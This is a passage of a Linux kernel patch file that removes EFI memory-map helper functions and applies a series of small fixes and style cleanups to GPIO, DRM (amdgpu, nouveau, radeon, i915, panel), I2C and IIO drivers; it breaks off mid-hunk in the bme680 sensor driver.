+-static phys_addr_t __init __efi_memmap_alloc_early(unsigned long size)
+-{
+-	return memblock_phys_alloc(size, SMP_CACHE_BYTES);
+-}
+-
+-static phys_addr_t __init __efi_memmap_alloc_late(unsigned long size)
+-{
+-	unsigned int order = get_order(size);
+-	struct page *p = alloc_pages(GFP_KERNEL, order);
+-
+-	if (!p)
+-		return 0;
+-
+-	return PFN_PHYS(page_to_pfn(p));
+-}
+-
+-void __init __efi_memmap_free(u64 phys, unsigned long size, unsigned long flags)
+-{
+-	if (flags & EFI_MEMMAP_MEMBLOCK) {
+-		if (slab_is_available())
+-			memblock_free_late(phys, size);
+-		else
+-			memblock_phys_free(phys, size);
+-	} else if (flags & EFI_MEMMAP_SLAB) {
+-		struct page *p = pfn_to_page(PHYS_PFN(phys));
+-		unsigned int order = get_order(size);
+-
+-		free_pages((unsigned long) page_address(p), order);
+-	}
+-}
+-
+-static void __init efi_memmap_free(void)
+-{
+-	__efi_memmap_free(efi.memmap.phys_map,
+-			efi.memmap.desc_size * efi.memmap.nr_map,
+-			efi.memmap.flags);
+-}
+-
+-/**
+- * efi_memmap_alloc - Allocate memory for the EFI memory map
+- * @num_entries: Number of entries in the allocated map.
+- * @data: efi memmap installation parameters
+- *
+- * Depending on whether mm_init() has already been invoked or not,
+- * either memblock or "normal" page allocation is used.
+- *
+- * Returns zero on success, a negative error code on failure.
+- */
+-int __init efi_memmap_alloc(unsigned int num_entries,
+-		struct efi_memory_map_data *data)
+-{
+-	/* Expect allocation parameters are zero initialized */
+-	WARN_ON(data->phys_map || data->size);
+-
+-	data->size = num_entries * efi.memmap.desc_size;
+-	data->desc_version = efi.memmap.desc_version;
+-	data->desc_size = efi.memmap.desc_size;
+-	data->flags &= ~(EFI_MEMMAP_SLAB | EFI_MEMMAP_MEMBLOCK);
+-	data->flags |= efi.memmap.flags & EFI_MEMMAP_LATE;
+-
+-	if (slab_is_available()) {
+-		data->flags |= EFI_MEMMAP_SLAB;
+-		data->phys_map = __efi_memmap_alloc_late(data->size);
+-	} else {
+-		data->flags |= EFI_MEMMAP_MEMBLOCK;
+-		data->phys_map = __efi_memmap_alloc_early(data->size);
+-	}
+-
+-	if (!data->phys_map)
+-		return -ENOMEM;
+-	return 0;
+-}
++#include <asm/early_ioremap.h>
++#include <asm/efi.h>
+ 
+ /**
+  * __efi_memmap_init - Common code for mapping the EFI memory map
+@@ -101,14 +30,11 @@ int __init efi_memmap_alloc(unsigned int num_entries,
+  *
+  * Returns zero on success, a negative error code on failure.
+  */
+-static int __init __efi_memmap_init(struct efi_memory_map_data *data)
++int __init __efi_memmap_init(struct efi_memory_map_data *data)
+ {
+ 	struct efi_memory_map map;
+ 	phys_addr_t phys_map;
+ 
+-	if (efi_enabled(EFI_PARAVIRT))
+-		return 0;
+-
+ 	phys_map = data->phys_map;
+ 
+ 	if (data->flags & EFI_MEMMAP_LATE)
+@@ -121,9 +47,6 @@ static int __init __efi_memmap_init(struct efi_memory_map_data *data)
+ 		return -ENOMEM;
+ 	}
+ 
+-	/* NOP if data->flags & (EFI_MEMMAP_MEMBLOCK | EFI_MEMMAP_SLAB) == 0 */
+-	efi_memmap_free();
+-
+ 	map.phys_map = data->phys_map;
+ 	map.nr_map = data->size / data->desc_size;
+ 	map.map_end = map.map + data->size;
+@@ -220,158 +143,3 @@ int __init efi_memmap_init_late(phys_addr_t addr, unsigned long size)
+ 
+ 	return __efi_memmap_init(&data);
+ }
+-
+-/**
+- * efi_memmap_install - Install a new EFI memory map in efi.memmap
+- * @ctx: map allocation parameters (address, size, flags)
+- *
+- * Unlike efi_memmap_init_*(), this function does not allow the caller
+- * to switch from early to late mappings. It simply uses the existing
+- * mapping function and installs the new memmap.
+- *
+- * Returns zero on success, a negative error code on failure.
+- */
+-int __init efi_memmap_install(struct efi_memory_map_data *data)
+-{
+-	efi_memmap_unmap();
+-
+-	return __efi_memmap_init(data);
+-}
+-
+-/**
+- * efi_memmap_split_count - Count number of additional EFI memmap entries
+- * @md: EFI memory descriptor to split
+- * @range: Address range (start, end) to split around
+- *
+- * Returns the number of additional EFI memmap entries required to
+- * accommodate @range.
+- */
+-int __init efi_memmap_split_count(efi_memory_desc_t *md, struct range *range)
+-{
+-	u64 m_start, m_end;
+-	u64 start, end;
+-	int count = 0;
+-
+-	start = md->phys_addr;
+-	end = start + (md->num_pages << EFI_PAGE_SHIFT) - 1;
+-
+-	/* modifying range */
+-	m_start = range->start;
+-	m_end = range->end;
+-
+-	if (m_start <= start) {
+-		/* split into 2 parts */
+-		if (start < m_end && m_end < end)
+-			count++;
+-	}
+-
+-	if (start < m_start && m_start < end) {
+-		/* split into 3 parts */
+-		if (m_end < end)
+-			count += 2;
+-		/* split into 2 parts */
+-		if (end <= m_end)
+-			count++;
+-	}
+-
+-	return count;
+-}
+-
+-/**
+- * efi_memmap_insert - Insert a memory region in an EFI memmap
+- * @old_memmap: The existing EFI memory map structure
+- * @buf: Address of buffer to store new map
+- * @mem: Memory map entry to insert
+- *
+- * It is suggested that you call efi_memmap_split_count() first
+- * to see how large @buf needs to be.
+- */
+-void __init efi_memmap_insert(struct efi_memory_map *old_memmap, void *buf,
+-			      struct efi_mem_range *mem)
+-{
+-	u64 m_start, m_end, m_attr;
+-	efi_memory_desc_t *md;
+-	u64 start, end;
+-	void *old, *new;
+-
+-	/* modifying range */
+-	m_start = mem->range.start;
+-	m_end = mem->range.end;
+-	m_attr = mem->attribute;
+-
+-	/*
+-	 * The EFI memory map deals with regions in EFI_PAGE_SIZE
+-	 * units. Ensure that the region described by 'mem' is aligned
+-	 * correctly.
+-	 */
+-	if (!IS_ALIGNED(m_start, EFI_PAGE_SIZE) ||
+-	    !IS_ALIGNED(m_end + 1, EFI_PAGE_SIZE)) {
+-		WARN_ON(1);
+-		return;
+-	}
+-
+-	for (old = old_memmap->map, new = buf;
+-	     old < old_memmap->map_end;
+-	     old += old_memmap->desc_size, new += old_memmap->desc_size) {
+-
+-		/* copy original EFI memory descriptor */
+-		memcpy(new, old, old_memmap->desc_size);
+-		md = new;
+-		start = md->phys_addr;
+-		end = md->phys_addr + (md->num_pages << EFI_PAGE_SHIFT) - 1;
+-
+-		if (m_start <= start && end <= m_end)
+-			md->attribute |= m_attr;
+-
+-		if (m_start <= start &&
+-		    (start < m_end && m_end < end)) {
+-			/* first part */
+-			md->attribute |= m_attr;
+-			md->num_pages = (m_end - md->phys_addr + 1) >>
+-				EFI_PAGE_SHIFT;
+-			/* latter part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->phys_addr = m_end + 1;
+-			md->num_pages = (end - md->phys_addr + 1) >>
+-				EFI_PAGE_SHIFT;
+-		}
+-
+-		if ((start < m_start && m_start < end) && m_end < end) {
+-			/* first part */
+-			md->num_pages = (m_start - md->phys_addr) >>
+-				EFI_PAGE_SHIFT;
+-			/* middle part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->attribute |= m_attr;
+-			md->phys_addr = m_start;
+-			md->num_pages = (m_end - m_start + 1) >>
+-				EFI_PAGE_SHIFT;
+-			/* last part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->phys_addr = m_end + 1;
+-			md->num_pages = (end - m_end) >>
+-				EFI_PAGE_SHIFT;
+-		}
+-
+-		if ((start < m_start && m_start < end) &&
+-		    (end <= m_end)) {
+-			/* first part */
+-			md->num_pages = (m_start - md->phys_addr) >>
+-				EFI_PAGE_SHIFT;
+-			/* latter part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->phys_addr = m_start;
+-			md->num_pages = (end - md->phys_addr + 1) >>
+-				EFI_PAGE_SHIFT;
+-			md->attribute |= m_attr;
+-		}
+-	}
+-}
+diff --git a/drivers/gpio/gpio-davinci.c b/drivers/gpio/gpio-davinci.c
+index 69f3d864f69d3..206829165fc58 100644
+--- a/drivers/gpio/gpio-davinci.c
++++ b/drivers/gpio/gpio-davinci.c
+@@ -230,6 +230,11 @@ static int davinci_gpio_probe(struct platform_device *pdev)
+ 	else
+ 		nirq = DIV_ROUND_UP(ngpio, 16);
+ 
++	if (nirq > MAX_INT_PER_BANK) {
++		dev_err(dev, "Too many IRQs!\n");
++		return -EINVAL;
++	}
++
+ 	chips = devm_kzalloc(dev, sizeof(*chips), GFP_KERNEL);
+ 	if (!chips)
+ 		return -ENOMEM;
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index 97e8335716b01..be51bd00d2fd2 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -132,6 +132,10 @@ struct linehandle_state {
+ 	GPIOHANDLE_REQUEST_OPEN_DRAIN | \
+ 	GPIOHANDLE_REQUEST_OPEN_SOURCE)
+ 
++#define GPIOHANDLE_REQUEST_DIRECTION_FLAGS \
++	(GPIOHANDLE_REQUEST_INPUT | \
++	 GPIOHANDLE_REQUEST_OUTPUT)
++
+ static int linehandle_validate_flags(u32 flags)
+ {
+ 	/* Return an error if an unknown flag is set */
+@@ -212,21 +216,21 @@ static long linehandle_set_config(struct linehandle_state *lh,
+ 	if (ret)
+ 		return ret;
+ 
++	/* Lines must be reconfigured explicitly as input or output. */
++	if (!(lflags & GPIOHANDLE_REQUEST_DIRECTION_FLAGS))
++		return -EINVAL;
++
+ 	for (i = 0; i < lh->num_descs; i++) {
+ 		desc = lh->descs[i];
+-		linehandle_flags_to_desc_flags(gcnf.flags, &desc->flags);
++		linehandle_flags_to_desc_flags(lflags, &desc->flags);
+ 
+-		/*
+-		 * Lines have to be requested explicitly for input
+-		 * or output, else the line will be treated "as is".
+-		 */
+ 		if (lflags & GPIOHANDLE_REQUEST_OUTPUT) {
+ 			int val = !!gcnf.default_values[i];
+ 
+ 			ret = gpiod_direction_output(desc, val);
+ 			if (ret)
+ 				return ret;
+-		} else if (lflags & GPIOHANDLE_REQUEST_INPUT) {
++		} else {
+ 			ret = gpiod_direction_input(desc);
+ 			if (ret)
+ 				return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+index 0d017dc94f013..1e64720a70a2b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+@@ -387,7 +387,7 @@ amdgpu_atomfirmware_get_vram_info(struct amdgpu_device *adev,
+ 					mem_channel_number = vram_info->v30.channel_num;
+ 					mem_channel_width = vram_info->v30.channel_width;
+ 					if (vram_width)
+-						*vram_width = mem_channel_number * (1 << mem_channel_width);
++						*vram_width = mem_channel_number * 16;
+ 					break;
+ 				default:
+ 					return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index b11690a816e73..157441dd07041 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -980,7 +980,7 @@ void amdgpu_device_program_register_sequence(struct amdgpu_device *adev,
+ 	if (array_size % 3)
+ 		return;
+ 
+-	for (i = 0; i < array_size; i +=3) {
++	for (i = 0; i < array_size; i += 3) {
+ 		reg = registers[i + 0];
+ 		and_mask = registers[i + 1];
+ 		or_mask = registers[i + 2];
+@@ -1552,7 +1552,7 @@ static int amdgpu_device_check_arguments(struct amdgpu_device *adev)
+ 		dev_warn(adev->dev, "sched jobs (%d) must be at least 4\n",
+ 			 amdgpu_sched_jobs);
+ 		amdgpu_sched_jobs = 4;
+-	} else if (!is_power_of_2(amdgpu_sched_jobs)){
++	} else if (!is_power_of_2(amdgpu_sched_jobs)) {
+ 		dev_warn(adev->dev, "sched jobs (%d) must be a power of 2\n",
+ 			 amdgpu_sched_jobs);
+ 		amdgpu_sched_jobs = roundup_pow_of_two(amdgpu_sched_jobs);
+@@ -2747,8 +2747,9 @@ static int amdgpu_device_ip_late_init(struct amdgpu_device *adev)
+ 		DRM_ERROR("enable mgpu fan boost failed (%d).\n", r);
+ 
+ 	/* For passthrough configuration on arcturus and aldebaran, enable special handling SBR */
+-	if (amdgpu_passthrough(adev) && ((adev->asic_type == CHIP_ARCTURUS && adev->gmc.xgmi.num_physical_nodes > 1)||
+-			       adev->asic_type == CHIP_ALDEBARAN ))
++	if (amdgpu_passthrough(adev) &&
++	    ((adev->asic_type == CHIP_ARCTURUS && adev->gmc.xgmi.num_physical_nodes > 1) ||
++	     adev->asic_type == CHIP_ALDEBARAN))
+ 		amdgpu_dpm_handle_passthrough_sbr(adev, true);
+ 
+ 	if (adev->gmc.xgmi.num_physical_nodes > 1) {
+@@ -3077,7 +3078,7 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 		}
+ 		adev->ip_blocks[i].status.hw = false;
+ 		/* handle putting the SMC in the appropriate state */
+-		if(!amdgpu_sriov_vf(adev)){
++		if (!amdgpu_sriov_vf(adev)) {
+ 			if (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_SMC) {
+ 				r = amdgpu_dpm_set_mp1_state(adev, adev->mp1_state);
+ 				if (r) {
+@@ -4048,7 +4049,7 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ 
+ 	/* disable all interrupts */
+ 	amdgpu_irq_disable_all(adev);
+-	if (adev->mode_info.mode_config_initialized){
++	if (adev->mode_info.mode_config_initialized) {
+ 		if (!drm_drv_uses_atomic_modeset(adev_to_drm(adev)))
+ 			drm_helper_force_disable_all(adev_to_drm(adev));
+ 		else
+@@ -4755,42 +4756,45 @@ bool amdgpu_device_should_recover_gpu(struct amdgpu_device *adev)
+ 
+ int amdgpu_device_mode1_reset(struct amdgpu_device *adev)
+ {
+-        u32 i;
+-        int ret = 0;
++	u32 i;
++	int ret = 0;
+ 
+-        amdgpu_atombios_scratch_regs_engine_hung(adev, true);
++	amdgpu_atombios_scratch_regs_engine_hung(adev, true);
+ 
+-        dev_info(adev->dev, "GPU mode1 reset\n");
++	dev_info(adev->dev, "GPU mode1 reset\n");
+ 
+-        /* disable BM */
+-        pci_clear_master(adev->pdev);
++	/* Cache the state before bus master disable. The saved config space
++	 * values are used in other cases like restore after mode-2 reset.
++	 */
++	amdgpu_device_cache_pci_state(adev->pdev);
+ 
+-        amdgpu_device_cache_pci_state(adev->pdev);
++	/* disable BM */
++	pci_clear_master(adev->pdev);
+ 
+-        if (amdgpu_dpm_is_mode1_reset_supported(adev)) {
+-                dev_info(adev->dev, "GPU smu mode1 reset\n");
+-                ret = amdgpu_dpm_mode1_reset(adev);
+-        } else {
+-                dev_info(adev->dev, "GPU psp mode1 reset\n");
+-                ret = psp_gpu_reset(adev);
+-        }
++	if (amdgpu_dpm_is_mode1_reset_supported(adev)) {
++		dev_info(adev->dev, "GPU smu mode1 reset\n");
++		ret = amdgpu_dpm_mode1_reset(adev);
++	} else {
++		dev_info(adev->dev, "GPU psp mode1 reset\n");
++		ret = psp_gpu_reset(adev);
++	}
+ 
+-        if (ret)
+-                dev_err(adev->dev, "GPU mode1 reset failed\n");
++	if (ret)
++		dev_err(adev->dev, "GPU mode1 reset failed\n");
+ 
+-        amdgpu_device_load_pci_state(adev->pdev);
++	amdgpu_device_load_pci_state(adev->pdev);
+ 
+-        /* wait for asic to come out of reset */
+-        for (i = 0; i < adev->usec_timeout; i++) {
+-                u32 memsize = adev->nbio.funcs->get_memsize(adev);
++	/* wait for asic to come out of reset */
++	for (i = 0; i < adev->usec_timeout; i++) {
++		u32 memsize = adev->nbio.funcs->get_memsize(adev);
+ 
+-                if (memsize != 0xffffffff)
+-                        break;
+-                udelay(1);
+-        }
++		if (memsize != 0xffffffff)
++			break;
++		udelay(1);
++	}
+ 
+-        amdgpu_atombios_scratch_regs_engine_hung(adev, false);
+-        return ret;
++	amdgpu_atombios_scratch_regs_engine_hung(adev, false);
++	return ret;
+ }
+ 
+ int amdgpu_device_pre_asic_reset(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 9a5416331f02e..238c15c0c7e1e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -1662,7 +1662,7 @@ static const u16 amdgpu_unsupported_pciidlist[] = {
+ };
+ 
+ static const struct pci_device_id pciidlist[] = {
+-#ifdef  CONFIG_DRM_AMDGPU_SI
++#ifdef CONFIG_DRM_AMDGPU_SI
+ 	{0x1002, 0x6780, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CHIP_TAHITI},
+ 	{0x1002, 0x6784, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CHIP_TAHITI},
+ 	{0x1002, 0x6788, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CHIP_TAHITI},
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+index 06980b8527ff8..76f23652cc14d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+@@ -2,6 +2,7 @@
+ 
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_simple_kms_helper.h>
++#include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_vblank.h>
+ 
+ #include "amdgpu.h"
+@@ -313,7 +314,13 @@ static int amdgpu_vkms_prepare_fb(struct drm_plane *plane,
+ 		return 0;
+ 	}
+ 	afb = to_amdgpu_framebuffer(new_state->fb);
+-	obj = new_state->fb->obj[0];
++
++	obj = drm_gem_fb_get_obj(new_state->fb, 0);
++	if (!obj) {
++		DRM_ERROR("Failed to get obj from framebuffer\n");
++		return -EINVAL;
++	}
++
+ 	rbo = gem_to_amdgpu_bo(obj);
+ 	adev = amdgpu_ttm_adev(rbo->tbo.bdev);
+ 
+@@ -367,12 +374,19 @@ static void amdgpu_vkms_cleanup_fb(struct drm_plane *plane,
+ 				   struct drm_plane_state *old_state)
+ {
+ 	struct amdgpu_bo *rbo;
++	struct drm_gem_object *obj;
+ 	int r;
+ 
+ 	if (!old_state->fb)
+ 		return;
+ 
+-	rbo = gem_to_amdgpu_bo(old_state->fb->obj[0]);
++	obj = drm_gem_fb_get_obj(old_state->fb, 0);
++	if (!obj) {
++		DRM_ERROR("Failed to get obj from framebuffer\n");
++		return;
++	}
++
++	rbo = gem_to_amdgpu_bo(obj);
+ 	r = amdgpu_bo_reserve(rbo, false);
+ 	if (unlikely(r)) {
+ 		DRM_ERROR("failed to reserve rbo before unpin\n");
+diff --git a/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c b/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c
+index ea775e601686d..a9dbca9d9c0ce 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c
++++ b/drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c
+@@ -296,6 +296,7 @@ void i915_vma_revoke_fence(struct i915_vma *vma)
+ 		return;
+ 
+ 	GEM_BUG_ON(fence->vma != vma);
++	i915_active_wait(&fence->active);
+ 	GEM_BUG_ON(!i915_active_is_idle(&fence->active));
+ 	GEM_BUG_ON(atomic_read(&fence->pin_count));
+ 
+diff --git a/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c b/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c
+index be28e7bd74903..1da9d1e89f91b 100644
+--- a/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c
++++ b/drivers/gpu/drm/nouveau/dispnv04/tvnv17.c
+@@ -208,6 +208,8 @@ static int nv17_tv_get_ld_modes(struct drm_encoder *encoder,
+ 		struct drm_display_mode *mode;
+ 
+ 		mode = drm_mode_duplicate(encoder->dev, tv_mode);
++		if (!mode)
++			continue;
+ 
+ 		mode->clock = tv_norm->tv_enc_mode.vrefresh *
+ 			mode->htotal / 1000 *
+@@ -257,6 +259,8 @@ static int nv17_tv_get_hd_modes(struct drm_encoder *encoder,
+ 		if (modes[i].hdisplay == output_mode->hdisplay &&
+ 		    modes[i].vdisplay == output_mode->vdisplay) {
+ 			mode = drm_mode_duplicate(encoder->dev, output_mode);
++			if (!mode)
++				continue;
+ 			mode->type |= DRM_MODE_TYPE_PREFERRED;
+ 
+ 		} else {
+@@ -264,6 +268,8 @@ static int nv17_tv_get_hd_modes(struct drm_encoder *encoder,
+ 					    modes[i].vdisplay, 60, false,
+ 					    (output_mode->flags &
+ 					     DRM_MODE_FLAG_INTERLACE), false);
++			if (!mode)
++				continue;
+ 		}
+ 
+ 		/* CVT modes are sometimes unsuitable... */
+diff --git a/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c b/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c
+index cbb68caa36f26..4014c537e397d 100644
+--- a/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c
++++ b/drivers/gpu/drm/panel/panel-ilitek-ili9881c.c
+@@ -716,10 +716,10 @@ static int ili9881c_prepare(struct drm_panel *panel)
+ 	msleep(5);
+ 
+ 	/* And reset it */
+-	gpiod_set_value(ctx->reset, 1);
++	gpiod_set_value_cansleep(ctx->reset, 1);
+ 	msleep(20);
+ 
+-	gpiod_set_value(ctx->reset, 0);
++	gpiod_set_value_cansleep(ctx->reset, 0);
+ 	msleep(20);
+ 
+ 	for (i = 0; i < ctx->desc->init_length; i++) {
+@@ -774,7 +774,7 @@ static int ili9881c_unprepare(struct drm_panel *panel)
+ 
+ 	mipi_dsi_dcs_enter_sleep_mode(ctx->dsi);
+ 	regulator_disable(ctx->power);
+-	gpiod_set_value(ctx->reset, 1);
++	gpiod_set_value_cansleep(ctx->reset, 1);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index acb7f5c206d13..b560d62b6e219 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2371,6 +2371,7 @@ static const struct display_timing koe_tx26d202vm0bwa_timing = {
+ 	.vfront_porch = { 3, 5, 10 },
+ 	.vback_porch = { 2, 5, 10 },
+ 	.vsync_len = { 5, 5, 5 },
++	.flags = DISPLAY_FLAGS_DE_HIGH,
+ };
+ 
+ static const struct panel_desc koe_tx26d202vm0bwa = {
+diff --git a/drivers/gpu/drm/radeon/radeon.h b/drivers/gpu/drm/radeon/radeon.h
+index 166c18d62f6d7..ec86c04a0d989 100644
+--- a/drivers/gpu/drm/radeon/radeon.h
++++ b/drivers/gpu/drm/radeon/radeon.h
+@@ -131,7 +131,6 @@ extern int radeon_cik_support;
+ /* RADEON_IB_POOL_SIZE must be a power of 2 */
+ #define RADEON_IB_POOL_SIZE			16
+ #define RADEON_DEBUGFS_MAX_COMPONENTS		32
+-#define RADEONFB_CONN_LIMIT			4
+ #define RADEON_BIOS_NUM_SCRATCH			8
+ 
+ /* internal ring indices */
+diff --git a/drivers/gpu/drm/radeon/radeon_display.c b/drivers/gpu/drm/radeon/radeon_display.c
+index 1814bb8e14f10..dbee301b3b2e8 100644
+--- a/drivers/gpu/drm/radeon/radeon_display.c
++++ b/drivers/gpu/drm/radeon/radeon_display.c
+@@ -683,7 +683,7 @@ static void radeon_crtc_init(struct drm_device *dev, int index)
+ 	struct radeon_device *rdev = dev->dev_private;
+ 	struct radeon_crtc *radeon_crtc;
+ 
+-	radeon_crtc = kzalloc(sizeof(struct radeon_crtc) + (RADEONFB_CONN_LIMIT * sizeof(struct drm_connector *)), GFP_KERNEL);
++	radeon_crtc = kzalloc(sizeof(*radeon_crtc), GFP_KERNEL);
+ 	if (radeon_crtc == NULL)
+ 		return;
+ 
+@@ -709,12 +709,6 @@ static void radeon_crtc_init(struct drm_device *dev, int index)
+ 	dev->mode_config.cursor_width = radeon_crtc->max_cursor_width;
+ 	dev->mode_config.cursor_height = radeon_crtc->max_cursor_height;
+ 
+-#if 0
+-	radeon_crtc->mode_set.crtc = &radeon_crtc->base;
+-	radeon_crtc->mode_set.connectors = (struct drm_connector **)(radeon_crtc + 1);
+-	radeon_crtc->mode_set.num_connectors = 0;
+-#endif
+-
+ 	if (rdev->is_atom_bios && (ASIC_IS_AVIVO(rdev) || radeon_r4xx_atom))
+ 		radeon_atombios_init_crtc(dev, radeon_crtc);
+ 	else
+diff --git a/drivers/i2c/i2c-slave-testunit.c b/drivers/i2c/i2c-slave-testunit.c
+index 75ee7ebdb614f..54c08f48a8b85 100644
+--- a/drivers/i2c/i2c-slave-testunit.c
++++ b/drivers/i2c/i2c-slave-testunit.c
+@@ -118,9 +118,12 @@ static int i2c_slave_testunit_slave_cb(struct i2c_client *client,
+ 			queue_delayed_work(system_long_wq, &tu->worker,
+ 					   msecs_to_jiffies(10 * tu->regs[TU_REG_DELAY]));
+ 		}
+-		fallthrough;
++		break;
+ 
+ 	case I2C_SLAVE_WRITE_REQUESTED:
++		if (test_bit(TU_FLAG_IN_PROCESS, &tu->flags))
++			return -EBUSY;
++
+ 		memset(tu->regs, 0, TU_NUM_REGS);
+ 		tu->reg_idx = 0;
+ 		break;
+diff --git a/drivers/iio/accel/Kconfig b/drivers/iio/accel/Kconfig
+index 1f34747a68bfe..7b55a44815455 100644
+--- a/drivers/iio/accel/Kconfig
++++ b/drivers/iio/accel/Kconfig
+@@ -325,6 +325,8 @@ config DMARD10
+ config FXLS8962AF
+ 	tristate
+ 	depends on I2C || !I2C # cannot be built-in for modular I2C
++	select IIO_BUFFER
++	select IIO_KFIFO_BUF
+ 
+ config FXLS8962AF_I2C
+ 	tristate "NXP FXLS8962AF/FXLS8964AF Accelerometer I2C Driver"
+diff --git a/drivers/iio/adc/ad7266.c b/drivers/iio/adc/ad7266.c
+index 468c2656d2be7..98648c679a55c 100644
+--- a/drivers/iio/adc/ad7266.c
++++ b/drivers/iio/adc/ad7266.c
+@@ -157,6 +157,8 @@ static int ad7266_read_raw(struct iio_dev *indio_dev,
+ 		ret = ad7266_read_single(st, val, chan->address);
+ 		iio_device_release_direct_mode(indio_dev);
+ 
++		if (ret < 0)
++			return ret;
+ 		*val = (*val >> 2) & 0xfff;
+ 		if (chan->scan_type.sign == 's')
+ 			*val = sign_extend32(*val,
+diff --git a/drivers/iio/adc/xilinx-ams.c b/drivers/iio/adc/xilinx-ams.c
+index a507d2e170792..3db021b96ae9d 100644
+--- a/drivers/iio/adc/xilinx-ams.c
++++ b/drivers/iio/adc/xilinx-ams.c
+@@ -414,8 +414,12 @@ static void ams_enable_channel_sequence(struct iio_dev *indio_dev)
+ 
+ 	/* Run calibration of PS & PL as part of the sequence */
+ 	scan_mask = BIT(0) | BIT(AMS_PS_SEQ_MAX);
+-	for (i = 0; i < indio_dev->num_channels; i++)
+-		scan_mask |= BIT_ULL(indio_dev->channels[i].scan_index);
++	for (i = 0; i < indio_dev->num_channels; i++) {
++		const struct iio_chan_spec *chan = &indio_dev->channels[i];
++
++		if (chan->scan_index < AMS_CTRL_SEQ_BASE)
++			scan_mask |= BIT_ULL(chan->scan_index);
++	}
+ 
+ 	if (ams->ps_base) {
+ 		/* put sysmon in a soft reset to change the sequence */
+diff --git a/drivers/iio/chemical/bme680.h b/drivers/iio/chemical/bme680.h
+index 4edc5d21cb9fa..f959252a4fe66 100644
+--- a/drivers/iio/chemical/bme680.h
++++ b/drivers/iio/chemical/bme680.h
+@@ -54,7 +54,9 @@
+ #define   BME680_NB_CONV_MASK			GENMASK(3, 0)
+ 
+ #define BME680_REG_MEAS_STAT_0			0x1D
++#define   BME680_NEW_DATA_BIT			BIT(7)
+ #define   BME680_GAS_MEAS_BIT			BIT(6)
++#define   BME680_MEAS_BIT			BIT(5)
+ 
+ /* Calibration Parameters */
+ #define BME680_T2_LSB_REG	0x8A
+diff --git a/drivers/iio/chemical/bme680_core.c b/drivers/iio/chemical/bme680_core.c
+index ef5e0e46fd344..500f56834b01f 100644
+--- a/drivers/iio/chemical/bme680_core.c
++++ b/drivers/iio/chemical/bme680_core.c
+@@ -10,6 +10,7 @@
+  */
+ #include <linux/acpi.h>
+ #include <linux/bitfield.h>
++#include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/module.h>
+ #include <linux/log2.h>
+@@ -38,7 +39,7 @@ struct bme680_calib {
+ 	s8  par_h3;
+ 	s8  par_h4;
+ 	s8  par_h5;
+-	s8  par_h6;
++	u8  par_h6;
+ 	s8  par_h7;
+ 	s8  par_gh1;
+ 	s16 par_gh2;
+@@ -342,10 +343,10 @@ static s16 bme680_compensate_temp(struct bme680_data *data,
+ 	if (!calib->par_t2)
+ 		bme680_read_calib(data, calib);
+ 
+-	var1 = (adc_temp >> 3) - (calib->par_t1 << 1);
++	var1 = (adc_temp >> 3) - ((s32)calib->par_t1 << 1);
+ 	var2 = (var1 * calib->par_t2) >> 11;
+ 	var3 = ((var1 >> 1) * (var1 >> 1)) >> 12;
+-	var3 = (var3 * (calib->par_t3 << 4)) >> 14;
++	var3 = (var3 * ((s32)calib->par_t3 << 4)) >> 14;
+ 	data->t_fine = var2 + var3;
+ 	calc_temp = (data->t_fine * 5 + 128) >> 8;
+ 
+@@ -368,9 +369,9 @@ static u32 bme680_compensate_press(struct bme680_data *data,
+ 	var1 = (data->t_fine >> 1) - 64000;
+ 	var2 = ((((var1 >> 2) * (var1 >> 2)) >> 11) * calib->par_p6) >> 2;
